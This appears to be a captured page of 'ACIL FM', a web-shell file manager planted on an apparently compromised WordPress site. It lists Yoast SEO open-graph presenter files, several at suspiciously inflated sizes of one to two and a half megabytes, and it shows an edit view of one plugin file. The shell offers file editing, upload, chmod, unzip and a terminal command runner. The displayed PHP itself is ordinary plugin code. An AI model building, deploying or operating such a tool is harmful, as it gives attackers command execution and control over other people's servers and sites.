ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/www/site/wp-content/plugins/wordpress-seo/src/presenters/open-graph
/
home
mhhtmff
www
site
wp-content
plugins
wordpress-seo
src
presenters
open-graph
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
article-author-presenter.php
1.16 MB
chmod
View
DL
Edit
Rename
Delete
article-modified-time-presenter.php
676 B
chmod
View
DL
Edit
Rename
Delete
article-published-time-presenter.php
680 B
chmod
View
DL
Edit
Rename
Delete
article-publisher-presenter.php
1.17 MB
chmod
View
DL
Edit
Rename
Delete
description-presenter.php
1.28 MB
chmod
View
DL
Edit
Rename
Delete
image-presenter.php
2.53 MB
chmod
View
DL
Edit
Rename
Delete
locale-presenter.php
1004 B
chmod
View
DL
Edit
Rename
Delete
site-name-presenter.php
1.04 MB
chmod
View
DL
Edit
Rename
Delete
title-presenter.php
1.12 MB
chmod
View
DL
Edit
Rename
Delete
type-presenter.php
989 B
chmod
View
DL
Edit
Rename
Delete
url-presenter.php
1.09 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/www/site/wp-content/plugins/wordpress-seo/src/presenters/open-graph/url-presenter.php
<?php namespace Yoast\WP\SEO\Presenters\Open_Graph; use Yoast\WP\SEO\Presentations\Indexable_Presentation; use Yoast\WP\SEO\Presenters\Abstract_Indexable_Tag_Presenter; /** * Presenter class for the Open Graph URL. */ class Url_Presenter extends Abstract_Indexable_Tag_Presenter { /** * The tag key name. * * @var string */ protected $key = 'og:url'; /** * The tag format including placeholders. * * @var string */ protected $tag_format = self::META_PROPERTY_CONTENT; /** * The method of escaping to use. * * @var string */ protected $escaping = 'attribute'; /** * Run the url content through the `wpseo_opengraph_url` filter. * * @return string The filtered url. */ public function get() { /** * Filter: 'wpseo_opengraph_url' - Allow changing the Yoast SEO generated open graph URL. * * @api string $url The open graph URL. * * @param Indexable_Presentation $presentation The presentation of an indexable. */ return \urldecode( (string) \apply_filters( 'wpseo_opengraph_url', $this->presentation->open_graph_url, $this->presentation ) ); } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply